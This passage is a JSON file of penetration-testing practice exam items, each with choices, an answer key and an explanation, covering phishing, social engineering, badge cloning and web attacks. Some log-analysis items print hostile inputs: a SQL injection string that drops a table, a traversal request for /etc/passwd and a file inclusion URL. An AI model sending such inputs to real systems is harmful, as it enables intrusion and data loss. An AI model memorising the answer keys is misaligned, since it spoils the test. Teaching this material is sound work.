    "choice_c": "<code>net /viewpolicy</code>",
    "choice_d": "<code>net domain /admin</code>",
    "correct_answer": "B",
    "explanation": "The Windows <code>net</code> commands can display a wealth of information about a local domain, and the password policy can be reviewed by using the <code>net accounts /domain</code> command.",
    "topic_id": 3,
    "practice_test_id": 3,
    "related_articles": [
      199,
      288,
      189,
      192,
      107
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 139,
    "question": "Cynthia attempted a DNS poisoning attack as shown here. After her attempt, she does not see any traffic from her target system. What most likely happened to cause the attack to fail?<br>Insert Graphic[c07uf003.jpg]",
    "choice_a": "The DNS information was incorrect.",
    "choice_b": "The injection was too slow.",
    "choice_c": "The DNS cache was not refreshed.",
    "choice_d": "The client did not receive a trusted response.",
    "correct_answer": "B",
    "explanation": "Cynthia\u2019s response needs to arrive before the legitimate DNS server. If her timing isn\u2019t right, the legitimate response will be accepted.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      165,
      187,
      244,
      11,
      224
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 140,
    "question": "Elle wants to clone an RFID entry access card. Which type of card is most easily cloned using inexpensive cloning devices?",
    "choice_a": "Low-frequency 125 to 134.2 KHz card",
    "choice_b": "Medium-frequency 400 to 451 KHz card",
    "choice_c": "High-frequency 13.56 MHz card",
    "choice_d": "Ultra-high-frequency 865 to 928 MHz card",
    "correct_answer": "A",
    "explanation": "Low-frequency RFID cards are often used for entry access cards, and are easily cloned using inexpensive commodity cloning devices. Medium-frequency cards in the 400 to 451 KHz range do not exist, whereas high-frequency cards are more likely to be cloned using a phone\u2019s NFC capability. Ultra-high-frequency cards are less standardized, making cloning more complex.",
    "topic_id": 3,
    "practice_test_id": 3,
    "related_articles": [
      189,
      192,
      285,
      181,
      278
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 141,
    "question": "Cynthia wants to use a phishing attack to acquire credentials belonging to the senior leadership of her target. What type of phishing attack should she use?",
    "choice_a": "Smishing",
    "choice_b": "VIPhishing",
    "choice_c": "Whaling",
    "choice_d": "Spear phishing",
    "correct_answer": "C",
    "explanation": "Whaling is a specialized form of phishing that targets important leaders and senior staff. If Cynthia was specifically targeting individuals, it would be spear phishing. Smishing uses SMS messages, and VIPhishing was made up for this question.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      196,
      197,
      198,
      207,
      11
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 142,
    "question": "Mike wants to enter an organization\u2019s high-security data center. Which of the following techniques is most likely to stop his tailgating attempt?",
    "choice_a": "Security cameras",
    "choice_b": "A security vestibule",
    "choice_c": "An egress sensor",
    "choice_d": "An RFID badge reader",
    "correct_answer": "B",
    "explanation": "A security vestibule allows only one individual through at a time, with doors at either end that unlock and open one at a time. It will prevent most piggybacking or tailgating behavior unless employees are willfully negligent.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      189,
      288,
      94,
      107,
      13
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 143,
    "question": "Which of the following technologies is most resistant to badge cloning attacks if implemented properly?",
    "choice_a": "Low-frequency RFID",
    "choice_b": "Magstripes",
    "choice_c": "Medium-frequency RFID",
    "choice_d": "Smartcards",
    "correct_answer": "D",
    "explanation": "Most organizations continue to use RFID or magnetic-stripe technology for entry access cards, making a pentester\u2019s job easier, since both technologies can be cloned. Smartcards are far more difficult to clone if implemented properly.",
    "topic_id": 3,
    "practice_test_id": 1,
    "related_articles": [
      189,
      285,
      116,
      118,
      112
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 144,
    "question": "Jen has been contracted to perform a penetration test against Flamingo, Inc. As part of her pentest, she has been asked to conduct a phishing campaign and to use the results of that campaign to gain access to Flamingo systems and networks. The scope of the penetration test does not include a physical penetration test, so Jen must work entirely remotely.<br>Jen wants to send a phishing message to employees at the company. She wants to learn the user IDs of various targets in the company and decides to call them using a spoofed VoIP phone number similar to those used inside the company. Once she reaches her targets, she pretends to be an administrative assistant working with one of Flamingo\u2019s senior executives and asks her targets for their email account information. What type of social engineering is this?",
    "choice_a": "Impersonation",
    "choice_b": "Interrogation",
    "choice_c": "Shoulder surfing",
    "choice_d": "Administrivia",
    "correct_answer": "A",
    "explanation": "Jen is impersonating an administrative assistant. Interrogation techniques are more aggressive and run the risk of making the target defensive or aware they are being interrogated. Shoulder surfing is the process of looking over a person\u2019s shoulder to acquire information, and administrivia isn\u2019t a penetration testing term.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      196,
      194,
      11,
      200,
      207
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 145,
    "question": "Jen has been contracted to perform a penetration test against Flamingo, Inc. As part of her pentest, she has been asked to conduct a phishing campaign and to use the results of that campaign to gain access to Flamingo systems and networks. The scope of the penetration test does not include a physical penetration test, so Jen must work entirely remotely.<br>Jen wants to deploy a malicious website as part of her penetration testing attempt so that she can exploit browsers belonging to employees. What framework is best suited to this?",
    "choice_a": "Metasploit",
    "choice_b": "BeEF",
    "choice_c": "SET",
    "choice_d": "OWASP",
    "correct_answer": "B",
    "explanation": "The Browser Exploitation Framework (BeEF) is specifically designed for this type of attack. Jen can use it to easily deploy browser exploit tools to a malicious website and can then use various phishing and social engineering techniques to get Flamingo employees to visit the site.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      198,
      196,
      11,
      3,
      329
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 146,
    "question": "Jen has been contracted to perform a penetration test against Flamingo, Inc. As part of her pentest, she has been asked to conduct a phishing campaign and to use the results of that campaign to gain access to Flamingo systems and networks. The scope of the penetration test does not include a physical penetration test, so Jen must work entirely remotely.<br>After attempting to lure employees at Flamingo, Inc., to fall for a phishing campaign, Jen finds that she hasn\u2019t acquired any useful credentials. She decides to try a USB key drop. Which of the following Social Engineer Toolkit modules should she select to help her succeed?",
    "choice_a": "The Website Attack Vectors module",
    "choice_b": "The Infectious Media Generator",
    "choice_c": "The Mass Mailer module",
    "choice_d": "The Teensy USB HID attack module",
    "correct_answer": "B",
    "explanation": "Jen should use the Infectious Media Generator tool, which is designed to create thumb drives and other media that can be dropped on-site for employees to pick up. The Teensy USB HID attack module may be a tempting answer, but it is designed to make a Teensy (a tiny computer much like an Arduino) act like a keyboard or other human interface device rather than to create infected media. Creating a website attack or a mass mailer attack isn\u2019t part of a USB key drop.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      198,
      195,
      196,
      11,
      3
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 147,
    "question": "Chris sends a phishing email specifically to Susan, the CEO at his target company. What type of phishing attack is he conducting?",
    "choice_a": "CEO baiting",
    "choice_b": "Spear phishing",
    "choice_c": "Phish hooking",
    "choice_d": "Hook SETting",
    "correct_answer": "B",
    "explanation": "Chris is conducting a spear phishing attack. Spear phishing attacks target specific individuals. If Chris was targeting a group of important individuals, this might be a whaling attack instead. CEO baiting, phish hooking, and Hook SETting were all made up for this question.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      196,
      197,
      195,
      11,
      198
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 148,
    "question": "Frank receives a message to his cell phone from a phone number that appears to be from the IRS. When he answers, the caller tells him that he has past due taxes and is in legal trouble. What type of social engineering attack has Frank encountered?",
    "choice_a": "A spear phishing attack",
    "choice_b": "A whaling attack",
    "choice_c": "A vishing attack",
    "choice_d": "A SMS phishing attack",
    "correct_answer": "C",
    "explanation": "Frank has encountered a vishing attack, a type of attack conducted via phone that often relies on a perception of authority and urgency to acquire information from its targets. A spear phishing attack targets specific individuals or groups, and whaling attacks are aimed at VIPs\u2014neither of which is indicated in the question. The attack is via voice, not SMS, ruling that option out, too.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      196,
      194,
      11,
      198,
      207
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 149,
    "question": "Emily wants to gather information about an organization but does not want to enter the building. What physical data-gathering technique can she use to potentially gather business documents without entering the building?",
    "choice_a": "Piggybacking",
    "choice_b": "File surfing",
    "choice_c": "USB drops",
    "choice_d": "Dumpster diving",
    "correct_answer": "D",
    "explanation": "Emily can try dumpster diving. An organization\u2019s trash can be a treasure trove of information about the organization, its staff, and its current operations based on the documents and files that are thrown away. She might even discover entire PCs or discarded media!",
    "topic_id": 3,
    "practice_test_id": 3,
    "related_articles": [
      192,
      189,
      288,
      199,
      119
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 150,
    "question": "Cameron sends a phishing email to all of the administrative assistants in a company. What type of phishing attack is he conducting?",
    "choice_a": "Whaling",
    "choice_b": "Vishing",
    "choice_c": "A watering hole attack",
    "choice_d": "Spear phishing",
    "correct_answer": "D",
    "explanation": "Spear phishing is targeted to specific populations, in this case, administrative assistants. Whaling targets VIPs, vishing is done via phone calls, and a watering hole attack leverages a frequently visited site or application.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      196,
      198,
      11,
      195,
      197
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 151,
    "question": "Which social engineering motivation technique relies on persuading the target that other people have behaved similarly and thus that they could too?",
    "choice_a": "Likeness",
    "choice_b": "Fear",
    "choice_c": "Social proof",
    "choice_d": "Reciprocation",
    "correct_answer": "C",
    "explanation": "Social proof relies on persuading an individual that they can behave in a way similar to what they believe others have. A social proof scenario might involve explaining to the target that sharing passwords was commonly done among employees in a specific circumstance or that it was common practice to let other staff in through a secure door without an ID.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      11,
      194,
      197,
      207,
      198
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 152,
    "question": "Megan wants to clone an ID badge for the company that she is performing a penetration test against. Which of the following types of badge can be cloned without even touching it?",
    "choice_a": "Magstripe",
    "choice_b": "Smartcard",
    "choice_c": "RFID",
    "choice_d": "CAC",
    "correct_answer": "C",
    "explanation": "RFID badges are wireless and can sometimes be cloned from distances up to a few feet away. Magstripe cards need to be read with a magnetic-stripe reader, smartcards provide additional security that make them difficult to clone, and CAC cards are the U.S. government\u2019s smartcard implementation.",
    "topic_id": 3,
    "practice_test_id": 1,
    "related_articles": [
      189,
      285,
      288,
      118,
      278
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 153,
    "question": "Allan wants to gain access to a target company\u2019s premises but discovers that his original idea of jumping the fence probably isn\u2019t practical. His new plan is to pretend to be a delivery person with a box that requires a personal signature from an employee. What technique is he using?",
    "choice_a": "Authority",
    "choice_b": "Pretexting",
    "choice_c": "Social proof",
    "choice_d": "Likeness",
    "correct_answer": "B",
    "explanation": "Allan is using a pretext to gain access to the organization. Claiming to be a delivery person who needs a specific signature may get him past the initial security for the organization. He is not claiming particular authority, providing social proof that others allow him in, or claiming he is similar to the security person or receptionist.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      198,
      11,
      195,
      190,
      3
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 154,
    "question": "Charles sends a phishing email to a target organization and includes the line \u201cOnly five respondents will receive a cash prize.\u201d Which social engineering motivation strategy is he using?",
    "choice_a": "Scarcity",
    "choice_b": "Social proof",
    "choice_c": "Fear",
    "choice_d": "Authority",
    "correct_answer": "A",
    "explanation": "Scarcity can be a powerful motivator when performing a social engineering attempt. The email that Charles sent will use the limited number of cash prizes to motivate respondents. If he had added \u201cthe first five,\u201d he would have also targeted urgency, which is often paired with scarcity to provide additional motivation.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      196,
      194,
      11,
      200,
      197
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 155,
    "question": "What occurs during a quid pro quo social engineering attempt?",
    "choice_a": "The target is offered money.",
    "choice_b": "The target is asked for money.",
    "choice_c": "The target is made to feel indebted.",
    "choice_d": "The pentester is made to feel indebted.",
    "correct_answer": "C",
    "explanation": "A quid pro quo attempt relies on the social engineer offering something of perceived value so that the target will feel indebted to them. The target is then asked to perform an action or otherwise do what the pentester wants them to do.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      194,
      196,
      11,
      207,
      195
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 156,
    "question": "Andrew knows that the employees at his target company frequently visit a football discussion site popular in the local area. As part of his penetration testing, he successfully places malware on the site and takes over multiple PCs belonging to employees. What type of attack has he used?",
    "choice_a": "A PWNie attack",
    "choice_b": "A watercooler attack",
    "choice_c": "A clone attack",
    "choice_d": "A watering hole attack",
    "correct_answer": "D",
    "explanation": "Andrew has used a watering hole attack, but he has also made what might be a critical mistake. Placing malware on a third-party site accessed by many in the local area (or beyond!) is probably beyond the scope of his engagement and is likely illegal. A better plan would have been to target a resource owned and operated by the company itself and accessed only by internal staff members.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      197,
      198,
      11,
      3,
      2
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 157,
    "question": "Steve inadvertently sets off an alarm and is discovered by a security guard during an on-site penetration test. What should his first response be?",
    "choice_a": "Call the police.",
    "choice_b": "Attempt to escape.",
    "choice_c": "Provide his pretext.",
    "choice_d": "Call his organizational contact.",
    "correct_answer": "C",
    "explanation": "Once a pentester is caught, their first response should be to provide their pretext. A successful social engineering attempt at this point can salvage the penetration test attempt. If that doesn\u2019t work, calling the organizational contact for a \u201cget out of jail free\u201d response may be the only option in a difficult situation.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      191,
      194,
      198,
      3,
      11
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 158,
    "question": "A USB key drop is an example of what type of technique?",
    "choice_a": "Physical honeypot",
    "choice_b": "A humanitarian exploit",
    "choice_c": "Reverse dumpster diving",
    "choice_d": "A hybrid attack",
    "correct_answer": "A",
    "explanation": "USB key drops are sometimes referred to as physical honeypots. They tempt staff to plug unknown devices into their computers, which a well-trained and suspicious staff shouldn\u2019t do. The remaining options were made up for this question.",
    "topic_id": 3,
    "practice_test_id": 4,
    "related_articles": [
      189,
      285,
      192,
      193,
      94
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 159,
    "question": "Susan calls staff at the company she has been contracted to conduct a phishing campaign against, focusing on individuals in the finance department. Over a few days, she persuades an employee to send a wire transfer to an account she has set up after telling the employee that she has let their boss know how talented they are. What motivation technique has she used?",
    "choice_a": "Urgency",
    "choice_b": "Reciprocation",
    "choice_c": "Authority",
    "choice_d": "Fear",
    "correct_answer": "B",
    "explanation": "Susan is using the concept of reciprocation to persuade the employee that they should perform an action that benefits her, since she has done them a favor.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      196,
      198,
      200,
      207,
      221
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 160,
    "question": "Alexa carefully pays attention to an employee as they type in their entry code to her target organization\u2019s high-security area and writes down the code that she observes. What type of attack has she conducted?",
    "choice_a": "A Setec Astronomy attack",
    "choice_b": "Code surveillance",
    "choice_c": "Shoulder surfing",
    "choice_d": "Keypad capture",
    "correct_answer": "C",
    "explanation": "Shoulder surfing takes many forms, including watching as an employee types in an entry access code. Setec Astronomy is a reference to the excellent hacking movie <i>Sneakers</i>, and both code surveillance and keypad capture were made up for this question.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      194,
      11,
      3,
      196,
      183
    ],
    "source": "285006_Ch08"
  },
  {
    "id": 161,
    "question": "Which one of the following approaches, when feasible, is the most effective way to defeat injection attacks?",
    "choice_a": "Browser-based input validation",
    "choice_b": "Input allowlisting",
    "choice_c": "Input blocklisting",
    "choice_d": "Signature detection",
    "correct_answer": "B",
    "explanation": "Input allowlisting approaches define the specific input type or range that users may provide. When developers can write clear business rules defining allowable user input, allowlisting is definitely the most effective way to prevent injection attacks.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      201,
      203,
      204,
      202,
      226
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 162,
    "question": "Examine the following network diagram. What is the most appropriate location for a web application firewall (WAF) on this network?<br>Insert Graphic[c09uf003.jpg]",
    "choice_a": "Location A",
    "choice_b": "Location B",
    "choice_c": "Location C",
    "choice_d": "Location D",
    "correct_answer": "D",
    "explanation": "Web application firewalls must be placed in front of web servers. This rules out location C as an option. The next consideration is placing the WAF so that it can filter all traffic headed for the web server but where it sees a minimum amount of extraneous traffic. This makes location D the best option for placing a WAF.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      205,
      201,
      202,
      215,
      11
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 163,
    "question": "Joe is examining the logs for his web server and discovers that a user sent input to a web application that contained the string <code>WAITFOR</code>. What type of attack was the user likely attempting?",
    "choice_a": "Timing-based SQL injection",
    "choice_b": "HTML injection",
    "choice_c": "Cross-site scripting",
    "choice_d": "Content-based SQL injection",
    "correct_answer": "A",
    "explanation": "The use of the SQL <code>WAITFOR</code> command is a signature characteristic of a timing-based SQL injection attack.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      203,
      226,
      205,
      201,
      202
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 164,
    "question": "Which one of the following function calls is closely associated with Linux command injection attacks?",
    "choice_a": "<code>system()</code>",
    "choice_b": "<code>sudo()</code>",
    "choice_c": "<code>mkdir()</code>",
    "choice_d": "<code>root()</code>",
    "correct_answer": "A",
    "explanation": "The <code>system()</code> function executes a command string against the operating system from within an application and may be used in command injection attacks.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      204,
      201,
      203,
      217,
      205
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 165,
    "question": "Tina is conducting a penetration test and is trying to gain access to a user account. Which of the following is a good source for obtaining user account credentials?",
    "choice_a": "Social engineering",
    "choice_b": "Default account lists",
    "choice_c": "Password dumps from compromised sites",
    "choice_d": "All of the above",
    "correct_answer": "D",
    "explanation": "Penetration testers may use a wide variety of sources when seeking to gain access to individual user accounts. These may include conducting social engineering attacks against individual users, obtaining password dumps from previously compromised sites, obtaining default account lists, and conducting password cracking attacks.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      207,
      213,
      197,
      198,
      244
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 166,
    "question": "What type of credential used in Kerberos is often referred to as the \u201cgolden ticket\u201d because of its potential for widespread reuse?",
    "choice_a": "Session ticket",
    "choice_b": "Ticket granting ticket (TGT)",
    "choice_c": "Service ticket",
    "choice_d": "User ticket",
    "correct_answer": "B",
    "explanation": "TGTs are incredibly valuable and can be created with extended life spans. When attackers succeed in acquiring TGTs, the TGTs are often called \u201cgolden tickets\u201d because they allow complete access to the Kerberos-connected systems, including creation of new tickets, account changes, and even falsification of accounts or services.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      211,
      172,
      240,
      262,
      246
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 167,
    "question": "Wendy is a penetration tester who wishes to engage in a session hijacking attack. What information is crucial for Wendy to obtain to ensure that her attack will be successful?",
    "choice_a": "Session ticket",
    "choice_b": "Session cookie",
    "choice_c": "Username",
    "choice_d": "User password",
    "correct_answer": "B",
    "explanation": "Websites use cookies to maintain sessions over time. If Wendy is able to obtain a copy of the user\u2019s session cookie, she can use that cookie to impersonate the user\u2019s browser and hijack the authenticated session.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      208,
      200,
      209,
      206,
      11
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 168,
    "question": "Sherry is concerned that a web application in her organization supports unvalidated redirects. Which one of the following approaches would minimize the risk of this attack?",
    "choice_a": "Requiring HTTPS",
    "choice_b": "Encrypting session cookies",
    "choice_c": "Implementing multifactor authentication",
    "choice_d": "Restricting redirects to her domain",
    "correct_answer": "D",
    "explanation": "Unvalidated redirects instruct a web application to direct users to an arbitrary site at the conclusion of their transaction. This approach is quite dangerous because it allows an attacker to send users to a malicious site through a legitimate site that they trust. Sherry should restrict redirects so that they occur only within her trusted domain(s).",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      209,
      226,
      201,
      220,
      205
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 169,
    "question": "Joe checks his web server logs and sees that someone sent the following query string to an application running on the server:<br>http://www.mycompany.com/servicestatus.php?serviceID=892&serviceID=892'<br>; DROP TABLE Services;--<br>What type of attack was most likely attempted?",
    "choice_a": "Cross-site scripting",
    "choice_b": "Session hijacking",
    "choice_c": "Parameter pollution",
    "choice_d": "On-path",
    "correct_answer": "C",
    "explanation": "This query string is indicative of a parameter pollution attack. In this case, it appears that the attacker was waging a SQL injection attack and tried to use parameter pollution to slip the attack past content filtering technology. The two instances of the <code>serviceID</code> parameter in the query string indicate a parameter pollution attempt.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      202,
      203,
      205,
      11,
      320
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 170,
    "question": "Upon further inspection, Joe finds a series of thousands of requests to the same URL coming from a single IP address. Here are a few examples:<br>http://www.mycompany.com/servicestatus.php?serviceID=1 <br>http://www.mycompany.com/servicestatus.php?serviceID=2 <br>http://www.mycompany.com/servicestatus.php?serviceID=3 <br>http://www.mycompany.com/servicestatus.php?serviceID=4 <br>http://www.mycompany.com/servicestatus.php?serviceID=5 <br>http://www.mycompany.com/servicestatus.php?serviceID=6 <br>What type of vulnerability was the attacker likely trying to exploit?",
    "choice_a": "Insecure direct object reference",
    "choice_b": "File upload",
    "choice_c": "Unvalidated redirect",
    "choice_d": "Session hijacking",
    "correct_answer": "A",
    "explanation": "The series of thousands of requests incrementing a variable indicate that the attacker was most likely attempting to exploit an insecure direct object reference vulnerability.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      214,
      226,
      11,
      3,
      329
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 171,
    "question": "Joe\u2019s adventures in web server log analysis are not yet complete. As he continues to review the logs, he finds the request:<br>http://www.mycompany.com/../../../etc/passwd <br>What type of attack was most likely attempted?",
    "choice_a": "SQL injection",
    "choice_b": "Session hijacking",
    "choice_c": "Directory traversal",
    "choice_d": "File upload",
    "correct_answer": "C",
    "explanation": "In this case, the <code>..</code> operators are the telltale giveaway that the attacker was attempting to conduct a directory traversal attack. This particular attack sought to break out of the web server\u2019s root directory and access the <code>/etc/passwd</code> file on the server.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      215,
      216,
      226,
      11,
      329
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 172,
    "question": "What type of attack depends on the fact that users are often logged into many websites simultaneously in the same browser?",
    "choice_a": "SQL injection",
    "choice_b": "Cross-site scripting",
    "choice_c": "Cross-site request forgery (XSRF)",
    "choice_d": "File inclusion",
    "correct_answer": "C",
    "explanation": "XSRF attacks work by making the reasonable assumption that users are often logged into many different websites at the same time. Attackers then embed code in one website that sends a command to a second website.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      226,
      11,
      217,
      204,
      209
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 173,
    "question": "What type of cross-site scripting attack would not be visible to a security professional inspecting the HTML source code in a browser?",
    "choice_a": "Reflected XSS",
    "choice_b": "Stored XSS",
    "choice_c": "Persistent XSS",
    "choice_d": "DOM-based XSS",
    "correct_answer": "D",
    "explanation": "DOM-based XSS attacks hide the attack code within the Document Object Model. This code would not be visible to someone viewing the HTML source of the page. Other XSS attacks would leave visible traces in the browser.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      219,
      226,
      216,
      204,
      238
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 174,
    "question": "Which one of the following attacks is an example of a race condition exploitation?",
    "choice_a": "XSRF",
    "choice_b": "XSS",
    "choice_c": "TOCTTOU",
    "choice_d": "SQLi",
    "correct_answer": "C",
    "explanation": "The time-of-check-to-time-of-use (TOCTTOU or TOC/TOU) issue is a race condition that occurs when a program checks access permissions too far in advance of a resource request.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      114,
      88,
      92,
      232,
      227
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 175,
    "question": "Tom is a software developer who creates code for sale to the public. He would like to assure his users that the code they receive actually came from him. What technique can he use to best provide this assurance?",
    "choice_a": "Code signing",
    "choice_b": "Code endorsement",
    "choice_c": "Code encryption",
    "choice_d": "Code obfuscation",
    "correct_answer": "A",
    "explanation": "Code signing provides developers with a way to confirm the authenticity of their code to end users. Developers use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer\u2019s public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      226,
      204,
      217,
      329,
      236
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 176,
    "question": "Shahla would like to perform testing of an API and is looking for a tool that makes it easy to send and manipulate API requests. What tool would best meet her needs?",
    "choice_a": "Postman",
    "choice_b": "DirBuster",
    "choice_c": "Gobuster",
    "choice_d": "Wfuzz",
    "correct_answer": "A",
    "explanation": "Postman is the best tool for Shahla\u2019s needs because it is specifically designed for sending, manipulating, and testing API requests. It offers a user-friendly interface and extensive features tailored for API development and testing. DirBuster is primarily used for brute-forcing directories and files on web servers, not for API testing. Gobuster is also a tool for directory and file brute-forcing, making it unsuitable for Shahla\u2019s requirements. Wfuzz is focused on web application security testing, particularly fuzzing for vulnerabilities, and is not designed for API request manipulation or testing.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      226,
      220,
      210,
      331,
      11
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 177,
    "question": "Norm is performing a penetration test of a web application and would like to manipulate the input sent to the application before it leaves his browser. Which one of the following tools would assist him with this task?",
    "choice_a": "Wfuzz",
    "choice_b": "ZAP",
    "choice_c": "Gobuster",
    "choice_d": "WPScan",
    "correct_answer": "B",
    "explanation": "ZAP (Zed Attack Proxy) is the best tool for Norm because it allows him to intercept and manipulate HTTP requests before they leave his browser. This makes it ideal for testing how web applications handle different inputs during a penetration test. Wfuzz is designed for brute-forcing web applications, not for intercepting and modifying requests. Gobuster focuses on directory and file brute-forcing, so it doesn\u2019t offer the capability Norm needs. WPScan is specifically for scanning WordPress sites for vulnerabilities and lacks the functionality to manipulate input in real time.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      11,
      219,
      201,
      202,
      205
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 178,
    "question": "What control is most commonly used to secure access to API interfaces?",
    "choice_a": "API keys",
    "choice_b": "Passwords",
    "choice_c": "Challenge-response",
    "choice_d": "Biometric authentication",
    "correct_answer": "A",
    "explanation": "API use may be restricted by assigning legitimate users unique API keys that grant them access, subject to their own authorization constraints and bandwidth limitations.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      223,
      264,
      208,
      226,
      249
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 179,
    "question": "Renee recently discovered that some of her organization\u2019s API keys were inadvertently posted in a GitHub repository. What tool can best help her identify any other similar disclosures?",
    "choice_a": "ZAP",
    "choice_b": "TruffleHog",
    "choice_c": "Gobuster",
    "choice_d": "Sqlmap",
    "correct_answer": "B",
    "explanation": "TruffleHog is the best tool to help Renee identify any other similar disclosures because it is specifically designed to search for secrets, like API keys, in Git repositories. It scans through the entire commit history to detect sensitive information that may have been accidentally committed. ZAP is a security tool primarily used for finding vulnerabilities in web applications, not for scanning repositories for secrets. Gobuster is focused on directory and file brute-forcing rather than searching for exposed secrets. Sqlmap is a tool for detecting and exploiting SQL injection vulnerabilities, which is unrelated to finding exposed API keys in repositories.",
    "topic_id": 3,
    "practice_test_id": 1,
    "related_articles": [
      143,
      232,
      225,
      229,
      89
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 180,
    "question": "During a penetration test, Bonnie discovers in a web server log that the testers attempted to access the following URL:<br>http://www.mycompany.com/sortusers.php?file=C:\\\\uploads\\\\attack.exe <br>What type of attack did they most likely attempt?",
    "choice_a": "Reflected XSS",
    "choice_b": "Persistent XSS",
    "choice_c": "Local file inclusion",
    "choice_d": "Remote file inclusion",
    "correct_answer": "C",
    "explanation": "This URL contains the address of a local file passed to a web application as an argument. It is most likely a local file inclusion exploit, attempting to execute a malicious file that the testers previously uploaded to the server.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      216,
      217,
      215,
      11,
      329
    ],
    "source": "285006_Ch09"
  },
  {
    "id": 181,
    "question": "Scott wants to crawl his penetration testing target\u2019s website and then build a word list using the data he recovers to help with his password cracking efforts. Which of the following tools should he use?",
    "choice_a": "DirBuster",
    "choice_b": "CeWL",
    "choice_c": "OLLY",
    "choice_d": "Grep-o-matic",
    "correct_answer": "B",
    "explanation": "The Customer Wordlist Generator, or CeWL, is a tool designed to spider a website and then build a word list using the files and web pages that it finds. The word list can then be used to help with password cracking.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      248,
      245,
      174,
      243,
      170
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 182,
    "question": "Michelle wants to attack the underlying hypervisor for a virtual machine. What type of attack is most likely to be successful?",
    "choice_a": "Container escape",
    "choice_b": "Compromise the administrative interface",
    "choice_c": "Hypervisor DoS",
    "choice_d": "VM escape",
    "correct_answer": "B",
    "explanation": "The most practical answer is to compromise the administrative interface for the underlying hypervisor. Although VM escape would be a useful tool, very few VM escape exploits have been discovered, and each has been quickly patched. That means that pentesters can\u2019t rely on one being available and unpatched when they encounter a VM host and should instead target administrative rights and access methods.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      259,
      257,
      213,
      207,
      11
    ],
    "source": "285006_Ch10"
  },
  {
    "id": 183,
